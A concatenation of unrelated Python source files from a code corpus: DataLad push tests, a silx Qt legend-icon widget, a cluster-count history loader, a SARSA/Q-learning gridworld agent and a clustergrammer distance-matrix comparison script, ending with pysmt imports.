res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "bar.dat"))
# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't
# work ATM
@skip_if_adjusted_branch
@slow # 16sec on Yarik's laptop
@with_tempfile(mkdir=True)
def test_auto_if_wanted_data_transfer_path_restriction(path):
path = Path(path)
ds_a = Dataset(path / "a").create()
ds_a_sub0 = ds_a.create("sub0")
ds_a_sub1 = ds_a.create("sub1")
for ds in [ds_a, ds_a_sub0, ds_a_sub1]:
(ds.pathobj / "sec.dat").write_text("sec")
(ds.pathobj / "reg.dat").write_text("reg")
ds_a.save(recursive=True)
ds_a.create_sibling(str(path / "b"), name="b",
annex_wanted="not metadata=distribution-restrictions=*",
recursive=True)
for ds in [ds_a, ds_a_sub0, ds_a_sub1]:
ds.repo.set_metadata(add={"distribution-restrictions": "doesntmatter"},
files=["sec.dat"])
# wanted-triggered --auto can be restricted to subdataset...
res = ds_a.push(to="b", path="sub0", data="auto-if-wanted",
recursive=True)
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "reg.dat"))
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a_sub0.pathobj / "reg.dat"))
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a_sub0.pathobj / "sec.dat"))
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a_sub1.pathobj / "reg.dat"))
# ... and to a wanted file.
res = ds_a.push(to="b", path="reg.dat", data="auto-if-wanted",
recursive=True)
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "reg.dat"))
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a_sub1.pathobj / "reg.dat"))
# But asking to transfer a file does not do it if the remote has a
# wanted setting and doesn't want it.
res = ds_a.push(to="b", path="sec.dat", data="auto-if-wanted",
recursive=True)
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "sec.dat"))
res = ds_a.push(to="b", path="sec.dat", data="anything", recursive=True)
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "sec.dat"))
@with_tempfile(mkdir=True)
def test_push_git_annex_branch_when_no_data(path):
path = Path(path)
ds = Dataset(path / "a").create()
target = mk_push_target(ds, "target", str(path / "target"),
annex=False, bare=True)
(ds.pathobj / "f0").write_text("0")
ds.save()
ds.push(to="target", data="nothing")
assert_in("git-annex",
{d["refname:strip=2"]
for d in target.for_each_ref_(fields="refname:strip=2")})
@known_failure_githubci_osx
@with_tree(tree={"ds": {"f0": "0", "f1": "0", "f2": "0",
"f3": "1",
"f4": "2", "f5": "2"}})
def test_push_git_annex_branch_many_paths_same_data(path):
path = Path(path)
ds = Dataset(path / "ds").create(force=True)
ds.save()
mk_push_target(ds, "target", str(path / "target"),
annex=True, bare=False)
nbytes = sum(ds.repo.get_content_annexinfo(paths=[f])[f]["bytesize"]
for f in [ds.repo.pathobj / "f0",
ds.repo.pathobj / "f3",
ds.repo.pathobj / "f4"])
with swallow_logs(new_level=logging.DEBUG) as cml:
res = ds.push(to="target")
assert_in("{} bytes of annex data".format(nbytes), cml.out)
# 3 files point to content already covered by another file.
assert_result_count(res, 3,
action="copy", type="file", status="notneeded")
@known_failure_githubci_osx
@with_tree(tree={"ds": {"f0": "0"}})
def test_push_matching(path):
path = Path(path)
ds = Dataset(path / "ds").create(force=True)
ds.config.set('push.default', 'matching', where='local')
ds.save()
remote_ds = mk_push_target(ds, 'local', str(path / 'dssibling'),
annex=True, bare=False)
# that fact that the next one even runs makes sure that we are in a better
# place than https://github.com/datalad/datalad/issues/4888
ds.push(to='local')
# and we pushed the commit in the current branch
eq_(remote_ds.get_hexsha(DEFAULT_BRANCH),
ds.repo.get_hexsha(DEFAULT_BRANCH))
@known_failure_githubci_win # https://github.com/datalad/datalad/issues/5271
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_nested_pushclone_cycle_allplatforms(origpath, storepath, clonepath):
if 'DATALAD_SEED' in os.environ:
# we are using create-sibling-ria via the cmdline in here
# this will create random UUIDs for datasets
# however, given a fixed seed each call to this command will start
# with the same RNG seed, hence yield the same UUID on the same
# machine -- leading to a collision
raise SkipTest(
'Test incompatible with fixed random number generator seed')
# the aim here is this high-level test a std create-push-clone cycle for a
# dataset with a subdataset, with the goal to ensure that correct branches
# and commits are tracked, regardless of platform behavior and condition
# of individual clones. Nothing fancy, just that the defaults behave in
# sensible ways
from datalad.cmd import WitlessRunner as Runner
run = Runner().run
# create original nested dataset
with chpwd(origpath):
run(['datalad', 'create', 'super'])
run(['datalad', 'create', '-d', 'super', str(Path('super', 'sub'))])
# verify essential linkage properties
orig_super = Dataset(Path(origpath, 'super'))
orig_sub = Dataset(orig_super.pathobj / 'sub')
(orig_super.pathobj / 'file1.txt').write_text('some1')
(orig_sub.pathobj / 'file2.txt').write_text('some1')
with chpwd(orig_super.path):
run(['datalad', 'save', '--recursive'])
# TODO not yet reported clean with adjusted branches
#assert_repo_status(orig_super.path)
# the "true" branch that sub is on, and the gitsha of the HEAD commit of it
orig_sub_corr_branch = \
orig_sub.repo.get_corresponding_branch() or orig_sub.repo.get_active_branch()
orig_sub_corr_commit = orig_sub.repo.get_hexsha(orig_sub_corr_branch)
# make sure the super trackes this commit
assert_in_results(
orig_super.subdatasets(),
path=orig_sub.path,
gitshasum=orig_sub_corr_commit,
# TODO it should also track the branch name
# Attempted: https://github.com/datalad/datalad/pull/3817
# But reverted: https://github.com/datalad/datalad/pull/4375
)
# publish to a store, to get into a platform-agnostic state
# (i.e. no impact of an annex-init of any kind)
store_url = 'ria+' + get_local_file_url(storepath)
with chpwd(orig_super.path):
run(['datalad', 'create-sibling-ria', '--recursive',
'-s', 'store', store_url])
run(['datalad', 'push', '--recursive', '--to', 'store'])
# we are using the 'store' sibling's URL, which should be a plain path
store_super = AnnexRepo(orig_super.siblings(name='store')[0]['url'], init=False)
store_sub = AnnexRepo(orig_sub.siblings(name='store')[0]['url'], init=False)
# both datasets in the store only carry the real branches, and nothing
# adjusted
for r in (store_super, store_sub):
eq_(set(r.get_branches()), set([orig_sub_corr_branch, 'git-annex']))
# and reobtain from a store
cloneurl = 'ria+' + get_local_file_url(str(storepath), compatibility='git')
with chpwd(clonepath):
run(['datalad', 'clone', cloneurl + '#' + orig_super.id, 'super'])
run(['datalad', '-C', 'super', 'get', '--recursive', '.'])
# verify that nothing has changed as a result of a push/clone cycle
clone_super = Dataset(Path(clonepath, 'super'))
clone_sub = Dataset(clone_super.pathobj / 'sub')
assert_in_results(
clone_super.subdatasets(),
path=clone_sub.path,
gitshasum=orig_sub_corr_commit,
)
for ds1, ds2, f in ((orig_super, clone_super, 'file1.txt'),
(orig_sub, clone_sub, 'file2.txt')):
eq_((ds1.pathobj / f).read_text(), (ds2.pathobj / f).read_text())
# get status info that does not recursive into subdatasets, i.e. not
# looking for uncommitted changes
# we should see no modification reported
assert_not_in_results(
clone_super.status(eval_subdataset_state='commit'),
state='modified')
# and now the same for a more expensive full status
assert_not_in_results(
clone_super.status(recursive=True),
state='modified')
@with_tempfile
def test_push_custom_summary(path):
path = Path(path)
ds = Dataset(path / "ds").create()
sib = mk_push_target(ds, "sib", str(path / "sib"), bare=False, annex=False)
(sib.pathobj / "f1").write_text("f1")
sib.save()
(ds.pathobj / "f2").write_text("f2")
ds.save()
# These options are true by default and our tests usually run with a
# temporary home, but set them to be sure.
ds.config.set("advice.pushUpdateRejected", "true", where="local")
ds.config.set("advice.pushFetchFirst", "true", where="local")
with swallow_outputs() as cmo:
ds.push(to="sib", result_renderer="default", on_failure="ignore")
assert_in("Hints:", cmo.out)
assert_in("action summary:", cmo.out)
|
the-stack_0_6554 | # coding: utf-8
# /*##########################################################################
#
# Copyright (c) 2004-2018 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
"""Widget displaying a symbol (marker symbol, line style and color) to identify
an item displayed by a plot.
"""
__authors__ = ["V.A. Sole", "T. Rueter", "T. Vincent"]
__license__ = "MIT"
__data__ = "11/11/2019"
import logging
import numpy
from .. import qt, colors
_logger = logging.getLogger(__name__)
# Build all symbols
# Courtesy of the pyqtgraph project
_Symbols = None
""""Cache supported symbols as Qt paths"""
_NoSymbols = (None, 'None', 'none', '', ' ')
"""List of values resulting in no symbol being displayed for a curve"""
_LineStyles = {
None: qt.Qt.NoPen,
'None': qt.Qt.NoPen,
'none': qt.Qt.NoPen,
'': qt.Qt.NoPen,
' ': qt.Qt.NoPen,
'-': qt.Qt.SolidLine,
'--': qt.Qt.DashLine,
':': qt.Qt.DotLine,
'-.': qt.Qt.DashDotLine
}
"""Conversion from matplotlib-like linestyle to Qt"""
_NoLineStyle = (None, 'None', 'none', '', ' ')
"""List of style values resulting in no line being displayed for a curve"""
_colormapImage = {}
"""Store cached pixmap"""
# FIXME: Could be better to use a LRU dictionary
_COLORMAP_PIXMAP_SIZE = 32
"""Size of the cached pixmaps for the colormaps"""
def _initSymbols():
"""Init the cached symbol structure if not yet done."""
global _Symbols
if _Symbols is not None:
return
symbols = dict([(name, qt.QPainterPath())
for name in ['o', 's', 't', 'd', '+', 'x', '.', ',']])
symbols['o'].addEllipse(qt.QRectF(.1, .1, .8, .8))
symbols['.'].addEllipse(qt.QRectF(.3, .3, .4, .4))
symbols[','].addEllipse(qt.QRectF(.4, .4, .2, .2))
symbols['s'].addRect(qt.QRectF(.1, .1, .8, .8))
coords = {
't': [(0.5, 0.), (.1, .8), (.9, .8)],
'd': [(0.1, 0.5), (0.5, 0.), (0.9, 0.5), (0.5, 1.)],
'+': [(0.0, 0.40), (0.40, 0.40), (0.40, 0.), (0.60, 0.),
(0.60, 0.40), (1., 0.40), (1., 0.60), (0.60, 0.60),
(0.60, 1.), (0.40, 1.), (0.40, 0.60), (0., 0.60)],
'x': [(0.0, 0.40), (0.40, 0.40), (0.40, 0.), (0.60, 0.),
(0.60, 0.40), (1., 0.40), (1., 0.60), (0.60, 0.60),
(0.60, 1.), (0.40, 1.), (0.40, 0.60), (0., 0.60)]
}
for s, c in coords.items():
symbols[s].moveTo(*c[0])
for x, y in c[1:]:
symbols[s].lineTo(x, y)
symbols[s].closeSubpath()
tr = qt.QTransform()
tr.rotate(45)
symbols['x'].translate(qt.QPointF(-0.5, -0.5))
symbols['x'] = tr.map(symbols['x'])
symbols['x'].translate(qt.QPointF(0.5, 0.5))
_Symbols = symbols
class LegendIconWidget(qt.QWidget):
"""Object displaying linestyle and symbol of plots.
:param QWidget parent: See :class:`QWidget`
"""
def __init__(self, parent=None):
super(LegendIconWidget, self).__init__(parent)
_initSymbols()
# Visibilities
self.showLine = True
self.showSymbol = True
self.showColormap = True
# Line attributes
self.lineStyle = qt.Qt.NoPen
self.lineWidth = 1.
self.lineColor = qt.Qt.green
self.symbol = ''
# Symbol attributes
self.symbolStyle = qt.Qt.SolidPattern
self.symbolColor = qt.Qt.green
self.symbolOutlineBrush = qt.QBrush(qt.Qt.white)
self.symbolColormap = None
"""Name or array of colors"""
self.colormap = None
"""Name or array of colors"""
# Control widget size: sizeHint "is the only acceptable
# alternative, so the widget can never grow or shrink"
# (c.f. Qt Doc, enum QSizePolicy::Policy)
self.setSizePolicy(qt.QSizePolicy.Fixed,
qt.QSizePolicy.Fixed)
def sizeHint(self):
return qt.QSize(50, 15)
def setSymbol(self, symbol):
"""Set the symbol"""
symbol = str(symbol)
if symbol not in _NoSymbols:
if symbol not in _Symbols:
raise ValueError("Unknown symbol: <%s>" % symbol)
self.symbol = symbol
self.update()
def setSymbolColor(self, color):
"""
:param color: determines the symbol color
:type style: qt.QColor
"""
self.symbolColor = qt.QColor(color)
self.update()
# Modify Line
def setLineColor(self, color):
self.lineColor = qt.QColor(color)
self.update()
def setLineWidth(self, width):
self.lineWidth = float(width)
self.update()
def setLineStyle(self, style):
"""Set the linestyle.
Possible line styles:
- '', ' ', 'None': No line
- '-': solid
- '--': dashed
- ':': dotted
- '-.': dash and dot
:param str style: The linestyle to use
"""
if style not in _LineStyles:
raise ValueError('Unknown style: %s', style)
self.lineStyle = _LineStyles[style]
self.update()
def _toLut(self, colormap):
"""Returns an internal LUT object used by this widget to manage
a colormap LUT.
If the argument is a `Colormap` object, only the current state will be
displayed. The object itself will not be stored, and further changes
of this `Colormap` will not update this widget.
:param Union[str,numpy.ndarray,Colormap] colormap: The colormap to
display
:rtype: Union[None,str,numpy.ndarray]
"""
if isinstance(colormap, colors.Colormap):
# Helper to allow to support Colormap objects
c = colormap.getName()
if c is None:
c = colormap.getNColors()
colormap = c
return colormap
def setColormap(self, colormap):
"""Set the colormap to display
If the argument is a `Colormap` object, only the current state will be
displayed. The object itself will not be stored, and further changes
of this `Colormap` will not update this widget.
:param Union[str,numpy.ndarray,Colormap] colormap: The colormap to
display
"""
colormap = self._toLut(colormap)
if colormap is None:
if self.colormap is None:
return
self.colormap = None
self.update()
return
if numpy.array_equal(self.colormap, colormap):
# This also works with strings
return
self.colormap = colormap
self.update()
def getColormap(self):
"""Returns the used colormap.
If the argument was set with a `Colormap` object, this function will
returns the LUT, represented by a string name or by an array or colors.
:returns: Union[None,str,numpy.ndarray,Colormap]
"""
return self.colormap
def setSymbolColormap(self, colormap):
"""Set the colormap to display a symbol
If the argument is a `Colormap` object, only the current state will be
displayed. The object itself will not be stored, and further changes
of this `Colormap` will not update this widget.
:param Union[str,numpy.ndarray,Colormap] colormap: The colormap to
display
"""
colormap = self._toLut(colormap)
if colormap is None:
if self.colormap is None:
return
self.symbolColormap = None
self.update()
return
if numpy.array_equal(self.symbolColormap, colormap):
# This also works with strings
return
self.symbolColormap = colormap
self.update()
def getSymbolColormap(self):
"""Returns the used symbol colormap.
If the argument was set with a `Colormap` object, this function will
returns the LUT, represented by a string name or by an array or colors.
:returns: Union[None,str,numpy.ndarray,Colormap]
"""
return self.colormap
# Paint
def paintEvent(self, event):
"""
:param event: event
:type event: QPaintEvent
"""
painter = qt.QPainter(self)
self.paint(painter, event.rect(), self.palette())
def paint(self, painter, rect, palette):
painter.save()
painter.setRenderHint(qt.QPainter.Antialiasing)
# Scale painter to the icon height
# current -> width = 2.5, height = 1.0
scale = float(self.height())
ratio = float(self.width()) / scale
symbolOffset = qt.QPointF(.5 * (ratio - 1.), 0.)
# Determine and scale offset
offset = qt.QPointF(float(rect.left()) / scale, float(rect.top()) / scale)
# Override color when disabled
if self.isEnabled():
overrideColor = None
else:
overrideColor = palette.color(qt.QPalette.Disabled,
qt.QPalette.WindowText)
# Draw BG rectangle (for debugging)
# bottomRight = qt.QPointF(
# float(rect.right())/scale,
# float(rect.bottom())/scale)
# painter.fillRect(qt.QRectF(offset, bottomRight),
# qt.QBrush(qt.Qt.green))
if self.showColormap:
if self.colormap is not None:
if self.isEnabled():
image = self.getColormapImage(self.colormap)
else:
image = self.getGrayedColormapImage(self.colormap)
pixmapRect = qt.QRect(0, 0, _COLORMAP_PIXMAP_SIZE, 1)
widthMargin = 0
halfHeight = 4
dest = qt.QRect(
rect.left() + widthMargin,
rect.center().y() - halfHeight + 1,
rect.width() - widthMargin * 2,
halfHeight * 2,
)
painter.drawImage(dest, image, pixmapRect)
painter.scale(scale, scale)
llist = []
if self.showLine:
linePath = qt.QPainterPath()
linePath.moveTo(0., 0.5)
linePath.lineTo(ratio, 0.5)
# linePath.lineTo(2.5, 0.5)
lineBrush = qt.QBrush(
self.lineColor if overrideColor is None else overrideColor)
linePen = qt.QPen(
lineBrush,
(self.lineWidth / self.height()),
self.lineStyle,
qt.Qt.FlatCap
)
llist.append((linePath, linePen, lineBrush))
isValidSymbol = (len(self.symbol) and
self.symbol not in _NoSymbols)
if self.showSymbol and isValidSymbol:
if self.symbolColormap is None:
# PITFALL ahead: Let this be a warning to others
# symbolPath = Symbols[self.symbol]
# Copy before translate! Dict is a mutable type
symbolPath = qt.QPainterPath(_Symbols[self.symbol])
symbolPath.translate(symbolOffset)
symbolBrush = qt.QBrush(
self.symbolColor if overrideColor is None else overrideColor,
self.symbolStyle)
symbolPen = qt.QPen(
self.symbolOutlineBrush, # Brush
1. / self.height(), # Width
qt.Qt.SolidLine # Style
)
llist.append((symbolPath,
symbolPen,
symbolBrush))
else:
nbSymbols = int(ratio + 2)
for i in range(nbSymbols):
if self.isEnabled():
image = self.getColormapImage(self.symbolColormap)
else:
image = self.getGrayedColormapImage(self.symbolColormap)
pos = int((_COLORMAP_PIXMAP_SIZE / nbSymbols) * i)
pos = numpy.clip(pos, 0, _COLORMAP_PIXMAP_SIZE-1)
color = image.pixelColor(pos, 0)
delta = qt.QPointF(ratio * ((i - (nbSymbols-1)/2) / nbSymbols), 0)
symbolPath = qt.QPainterPath(_Symbols[self.symbol])
symbolPath.translate(symbolOffset + delta)
symbolBrush = qt.QBrush(color, self.symbolStyle)
symbolPen = qt.QPen(
self.symbolOutlineBrush, # Brush
1. / self.height(), # Width
qt.Qt.SolidLine # Style
)
llist.append((symbolPath,
symbolPen,
symbolBrush))
# Draw
for path, pen, brush in llist:
path.translate(offset)
painter.setPen(pen)
painter.setBrush(brush)
painter.drawPath(path)
painter.restore()
# Helpers
@staticmethod
def isEmptySymbol(symbol):
"""Returns True if this symbol description will result in an empty
symbol."""
return symbol in _NoSymbols
@staticmethod
def isEmptyLineStyle(lineStyle):
"""Returns True if this line style description will result in an empty
line."""
return lineStyle in _NoLineStyle
@staticmethod
def _getColormapKey(colormap):
"""
Returns the key used to store the image in the data storage
"""
if isinstance(colormap, numpy.ndarray):
key = tuple(colormap)
else:
key = colormap
return key
@staticmethod
def getGrayedColormapImage(colormap):
"""Return a grayed version image preview from a LUT name.
This images are cached into a global structure.
:param Union[str,numpy.ndarray] colormap: Description of the LUT
:rtype: qt.QImage
"""
key = LegendIconWidget._getColormapKey(colormap)
grayKey = (key, "gray")
image = _colormapImage.get(grayKey, None)
if image is None:
image = LegendIconWidget.getColormapImage(colormap)
image = image.convertToFormat(qt.QImage.Format_Grayscale8)
_colormapImage[grayKey] = image
return image
@staticmethod
def getColormapImage(colormap):
"""Return an image preview from a LUT name.
This images are cached into a global structure.
:param Union[str,numpy.ndarray] colormap: Description of the LUT
:rtype: qt.QImage
"""
key = LegendIconWidget._getColormapKey(colormap)
image = _colormapImage.get(key, None)
if image is None:
image = LegendIconWidget.createColormapImage(colormap)
_colormapImage[key] = image
return image
@staticmethod
def createColormapImage(colormap):
"""Create and return an icon preview from a LUT name.
This icons are cached into a global structure.
:param Union[str,numpy.ndarray] colormap: Description of the LUT
:rtype: qt.QImage
"""
size = _COLORMAP_PIXMAP_SIZE
if isinstance(colormap, numpy.ndarray):
lut = colormap
if len(lut) > size:
# Down sample
step = int(len(lut) / size)
lut = lut[::step]
elif len(lut) < size:
# Over sample
indexes = numpy.arange(size) / float(size) * (len(lut) - 1)
indexes = indexes.astype("int")
lut = lut[indexes]
else:
colormap = colors.Colormap(colormap)
lut = colormap.getNColors(size)
if lut is None or len(lut) == 0:
return qt.QIcon()
pixmap = qt.QPixmap(size, 1)
painter = qt.QPainter(pixmap)
for i in range(size):
rgb = lut[i]
r, g, b = rgb[0], rgb[1], rgb[2]
painter.setPen(qt.QColor(r, g, b))
painter.drawPoint(qt.QPoint(i, 0))
painter.end()
return pixmap.toImage()
|
the-stack_0_6555 | import sys
import os
import scipy.sparse
import numpy as np
from util import argsort_bigtosmall_stable
def loadKeffForTask(
taskpath,
effCountThr=0.01,
MIN_PRESENT_COUNT=1e-10,
**kwargs):
''' Load effective number of clusters used at each checkpoint.
Returns
-------
Keff : 1D array, size nCheckpoint
'''
effCountThr = np.maximum(effCountThr, MIN_PRESENT_COUNT)
CountMat, Info = loadCountHistoriesForTask(taskpath,
MIN_PRESENT_COUNT=MIN_PRESENT_COUNT)
return np.sum(CountMat >= effCountThr, axis=1)
def loadCountHistoriesForTask(
taskpath,
sortBy=None,
MIN_PRESENT_COUNT=1e-10):
''' Load sparse matrix of counts for all clusters used throughout task.
Returns
-------
AllCountMat : 2D array, nCheckpoint x nTotal
Info : dict
'''
idpath = os.path.join(taskpath, 'ActiveIDs.txt')
ctpath = os.path.join(taskpath, 'ActiveCounts.txt')
fid = open(idpath, 'r')
fct = open(ctpath, 'r')
data = list()
colids = list()
rowids = list()
for ii, idline in enumerate(fid.readlines()):
idstr = str(idline.strip())
ctstr = str(fct.readline().strip())
idvec = np.asarray(idstr.split(' '), dtype=np.int32)
ctvec = np.asarray(ctstr.split(' '), dtype=np.float)
data.extend(ctvec)
colids.extend(idvec)
rowids.extend( ii * np.ones(idvec.size))
# Identify columns by unique ids
allUIDs = np.unique(colids)
compactColIDs = -1 * np.ones_like(colids)
for pos, u in enumerate(allUIDs):
mask = colids == u
compactColIDs[mask] = pos
assert compactColIDs.min() >= 0
# CountMat : sparse matrix of active counts at each checkpoint
# Each row gives count (or zero if eliminated) at single lap
data = np.asarray(data)
np.maximum(data, MIN_PRESENT_COUNT, out=data)
ij = np.vstack([rowids, compactColIDs])
CountMat = scipy.sparse.csr_matrix((data, ij))
CountMat = CountMat.toarray()
assert allUIDs.size == CountMat.shape[1]
# Split all columns into two sets: active and eliminated
nCol = CountMat.shape[1]
elimCols = np.flatnonzero(CountMat[-1, :] < MIN_PRESENT_COUNT)
activeCols = np.setdiff1d(np.arange(nCol), elimCols)
nElimCol = len(elimCols)
nActiveCol = len(activeCols)
ElimCountMat = CountMat[:, elimCols]
ActiveCountMat = CountMat[:, activeCols]
elimUIDs = allUIDs[elimCols]
activeUIDs = allUIDs[activeCols]
# Fill out info dict
Info = dict(
CountMat=CountMat,
allUIDs=allUIDs,
ActiveCountMat=ActiveCountMat,
ElimCountMat=ElimCountMat,
activeCols=activeCols,
elimCols=elimCols,
activeUIDs=activeUIDs,
elimUIDs=elimUIDs)
if not isinstance(sortBy, str) or sortBy.lower().count('none'):
return CountMat, Info
if sortBy.lower().count('finalorder'):
rankedActiveUIDs = idvec
raise ValueError("TODO")
elif sortBy.lower().count('countvalues'):
## Sort columns from biggest to smallest (at last chkpt)
rankedActiveIDs = argsort_bigtosmall_stable(ActiveCountMat[-1,:])
else:
raise ValueError("TODO")
# Sort active set by size at last snapshot
ActiveCountMat = ActiveCountMat[:, rankedActiveIDs]
activeUIDs = activeUIDs[rankedActiveIDs]
activeCols = activeCols[rankedActiveIDs]
# Sort eliminated set by historical size
rankedElimIDs = argsort_bigtosmall_stable(ElimCountMat.sum(axis=0))
ElimCountMat = ElimCountMat[:, rankedElimIDs]
elimUIDs = elimUIDs[rankedElimIDs]
elimCols = elimCols[rankedElimIDs]
Info['activeUIDs'] = activeUIDs
Info['activeCols'] = activeCols
Info['elimUIDs'] = elimUIDs
Info['elimCols'] = elimCols
return ActiveCountMat, ElimCountMat, Info
def LoadActiveIDsForTaskFromLap(taskpath, queryLap='final'):
''' Load vector of active cluster UIDs for specific lap
Essentially reads a single line of the ActiveIDs.txt file from taskpath
Returns
-------
idvec : 1D array, size K
where K is number of clusters active at chosen lap
'''
lappath = os.path.join(taskpath, 'laps.txt')
laps = np.loadtxt(lappath)
if queryLap is not None and queryLap != 'final':
if queryLap not in laps:
raise ValueError('Target lap not found.')
idpath = os.path.join(taskpath, 'ActiveIDs.txt')
with open(idpath, 'r') as f:
for ii, curLap in enumerate(laps):
idstr = f.readline().strip()
if curLap == queryLap or (curLap == laps[-1] and queryLap == 'final'):
idvec = np.asarray(idstr.split(' '), dtype=np.int32)
return idvec
if __name__ == '__main__':
tpath = "/data/liv/xdump/BerkPatchB1/billings-alg=bnpyHDPbirthmerge-lik=ZeroMeanGauss-ECovMat=diagcovdata-sF=0.1-K=1-initname=bregmankmeans-nBatch=1/1/"
loadCountHistoriesForTask(tpath)
|
the-stack_0_6558 | import numpy as np
class Agent():
"""Three solving agents-
1. Sarsa(0)
2. Expected Sarsa
3. Q-Learning
policy used: epsilon greedy
Plus a run loop for windy gridworld
"""
def __init__(self, numStates, numActions, discount=1, lr = 0.5, update="sarsa0",
epsilon = 0.1):
self.update_Q = self.getAgent(update)
self.S, self.A = numStates, numActions
self.gamma = discount
self.epsilon = epsilon
self.lr = lr
self.Q = np.zeros((numStates,numActions))
def getAgent(self, update):
if update=="sarsa0":
return self.sarsa0
elif update=="expected-sarsa":
return self.sarsaE
elif update=="Q":
return self.Q_Learning
def epsilonGreedy(self,s):
if(np.random.uniform()>self.epsilon):
return np.argmax(self.Q[s])
else:
return np.random.choice(self.A)
def sarsa0(self, s, a, r, s1, a1):
self.Q[s,a] += self.lr*(r + self.gamma*self.Q[s1,a1]-self.Q[s,a])
def sarsaE(self, s, a, r, s1, a1):
#find expected Q
bestQ = np.max(self.Q[s1])
expected_sample = np.sum(self.Q[s1])*self.epsilon/self.A
expected = bestQ*(1-self.epsilon)+expected_sample
#find target
target = r + self.gamma*expected
#update Q
self.Q[s,a] += self.lr*(target-self.Q[s,a])
def Q_Learning(self, s, a, r, s1, a1):
self.Q[s,a] += self.lr*(r + self.gamma*np.max(self.Q[s1,a]) -self.Q[s,a])
# def run(self, env, steps = 8000, episodes=100,
# verbose=False):
# data = []
# for e in range(episodes):
# env.start()
# x, y = env.state()
# state = int(x+10*y)
# a = self.epsilonGreedy(state)
# for step in range(steps):
# x, y, r = env.step(a).values()
# new_state = x+10*y
# a1 = self.epsilonGreedy(new_state)
# self.update_Q(state, a, r, new_state, a1)
# state = new_state
# a = a1
# if(env.end()):
# break
# data.append(step)
# print(step)
# return data
|
the-stack_0_6559 | def main():
print('I will set up a pairwise-compete matrix')
compare_pairwise_complete()
# # test that distances calculated using custom and pdist functions are the same
# # - they are
# data_type = 'ptm_none'
# dist_metric = 'euclidean'
# compare_pdist_to_custom_dist_mat(data_type=data_type, dist_metric=dist_metric)
def compare_pairwise_complete(data_type='ptm_none',
dist_metric='euclidean', swap_nan=True):
'''
compare distance matrix based on pairwise complete calculation and normal
interpolate with zeros calculation
'''
filename = '../lung_cellline_3_1_16/lung_cl_all_ptm/precalc_processed/' + \
data_type + '.txt'
# interpolate missing values with zeros
dist_norm = calc_custom_dist(filename, data_type, dist_metric,
swap_nan=True)
# run pairwise complete comparisons
dist_pairwise = calc_custom_dist(filename, data_type, dist_metric,
swap_nan=False)
difference = dist_norm - dist_pairwise
print('\nthere is a difference between normal and pairwise complete')
print('--------------------------------------------------------------------')
print(dist_norm[:5])
print(dist_pairwise[:5])
print(sum(difference))
def compare_pdist_to_custom_dist_mat(data_type='ptm_none',
dist_metric='euclidean', swap_nan=True):
'''
calculate cell line distance based on data_type (e.g. expression) with
optional filtering and normalization
'''
filename = '../lung_cellline_3_1_16/lung_cl_all_ptm/precalc_processed/' + \
data_type + '.txt'
dist_pdist = calc_pdist_dist(filename, data_type, dist_metric)
dist_custom = calc_custom_dist(filename, data_type, dist_metric,
swap_nan=swap_nan)
difference = dist_pdist - dist_custom
print('\nno difference between custom calculation and pdist calculation')
print('--------------------------------------------------------------------')
print(dist_pdist[:5])
print(dist_custom[:5])
print(sum(difference))
def calc_custom_dist(filename, data_type, dist_metric, swap_nan=True):
import numpy as np
import pandas as pd
import scipy.spatial.distance as dist_fun
from scipy.spatial.distance import pdist
df = get_df(filename, swap_nan)
rows = df.index.tolist()
cols = df.columns.tolist()
dist_vector = np.zeros(666,)
# write for-loop to calculate custom distance matrix and compare result
# to pdist
num_calc = 0
for i in range(len(cols)):
col_1 = cols[i]
for j in range(len(cols)):
if j > i:
col_2 = cols[j]
vect_1 = df[col_1]
vect_2 = df[col_2]
mat = np.vstack((vect_1, vect_2)).transpose()
df_small = pd.DataFrame(mat)
# always dropna (nans will be optionally swapped out elsewhere)
df_small = df_small.dropna(axis=0)
# calc distance using pdist (only two vectors)
df_small = df_small.transpose()
dist_pdist = pdist(df_small, metric=dist_metric)
# # calculating distances of two vectors (using pdist instead)
# if dist_metric == 'euclidean':
# inst_dist = dist_fun.euclidean(vect_1, vect_2)
# elif dist_metric == 'cosine':
# inst_dist = dist_fun.cosine(vect_1, vect_2)
# save to distance vector
dist_vector[num_calc] = dist_pdist
num_calc = num_calc + 1
return dist_vector
def calc_pdist_dist(filename, data_type, dist_metric):
from scipy.spatial.distance import pdist, squareform
df = get_df(filename, swap_nan=True)
# transpose to calc distance matrix of columns
df = df.transpose()
dist_pdist = pdist(df, metric=dist_metric)
return dist_pdist
def get_df(filename, swap_nan=True):
from copy import deepcopy
from clustergrammer import Network
net = deepcopy(Network())
# load file and export dataframe
net.load_file(filename)
if swap_nan == True:
net.swap_nan_for_zero()
tmp_df = net.dat_to_df()
df = tmp_df['mat']
return df
main() |
the-stack_0_6560 | from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
